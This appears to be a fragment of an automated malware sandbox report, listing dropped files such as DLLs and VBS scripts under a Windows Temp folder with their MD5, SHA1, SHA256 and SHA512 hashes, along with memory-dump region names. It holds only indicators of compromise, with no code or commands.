SHA256 88378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67
SHA512 85b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac

C:\Users\Admin\AppData\Local\Temp\toolsync\ptMgr.dll

MD5 2087eb2d3fb639933ebe0a0614fd5218
SHA1 c1a1b75c8e76e000b7045092bd11100904a72840
SHA256 725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f
SHA512 3390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e

C:\Users\Admin\AppData\Local\Temp\toolsync\WCLDll.dll

MD5 b3e030ab715a02f8864a79f552a247b7
SHA1 4b1c18370b6e8a69c5f8b3ff543375f74e6e58fa
SHA256 2a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955
SHA512 cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda

C:\Users\Admin\AppData\Local\Temp\toolsync\cyclopedia.html

MD5 db3f3969e8a2f913fe3643d8465171b1
SHA1 736095ea1e02547a6df2586fffdbf31bb7d23656
SHA256 c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043
SHA512 0a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b

C:\Users\Admin\AppData\Local\Temp\toolsync\audiovisual.psd

MD5 a0a180d2677f494049d7a55c888fed93
SHA1 d09358fddc9a67ae55b5ba4a34fba04357b528db
SHA256 5e086150a36e2e98c91464a210499648832172f883c1bd515c4a0661a10866bd
SHA512 1f152fe593a25c05973b351206a40953bd801b8c77f04c2f20c966869fe72d2b6c71ed5bd77e64942153f0dca590e2655340a93d8b7eb29d558152f1a7b6fde1

memory/3948-42-0x0000000073CA0000-0x0000000073E1B000-memory.dmp

memory/3948-43-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp

memory/1856-70-0x0000000073CA0000-0x0000000073E1B000-memory.dmp

memory/1856-71-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp

memory/1856-72-0x0000000073CA0000-0x0000000073E1B000-memory.dmp

memory/3232-73-0x00007FF8CB900000-0x00007FF8CBA72000-memory.dmp

memory/1856-74-0x0000000073CA0000-0x0000000073E1B000-memory.dmp

memory/956-76-0x0000000073CA0000-0x0000000073E1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f287595d

MD5 88a381396c6d9e97c422942355b39f5d
SHA1 d3e47ef8fa3191f3f4806a6051f2f4b7bbc667e1
SHA256 367ecc25206001828a90b5d935a4cce9b90322d21fc9316a5c6dd431df8715c7
SHA512 0545b57e97f1182da64ee4e12c8547979d0f6193c2b64a0d4d9f67e3797ec0d91a19218697bca1ea8b2b76c04ded1e798e5aa57f113beedb5e47b275362c990a

memory/956-78-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp

memory/956-81-0x0000000073CA0000-0x0000000073E1B000-memory.dmp

memory/956-82-0x0000000073CA0000-0x0000000073E1B000-memory.dmp

memory/956-84-0x0000000073CA0000-0x0000000073E1B000-memory.dmp

memory/1084-85-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp

memory/1084-86-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1084-88-0x00000000008C0000-0x0000000000CF3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\check1.vbs

MD5 85a2ebad40c21ba1da77230265b5351f
SHA1 803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256 b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA512 77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

memory/1084-93-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1084-94-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1084-95-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1084-99-0x0000000000400000-0x0000000000483000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\upeegjbouopehpnbxkclalylbt.vbs

MD5 5969db124f530f24b0e1b305ca5a8291
SHA1 5eb79a70cc356a20ba39913489a5cdca36f83011
SHA256 3a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072
SHA512 0297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290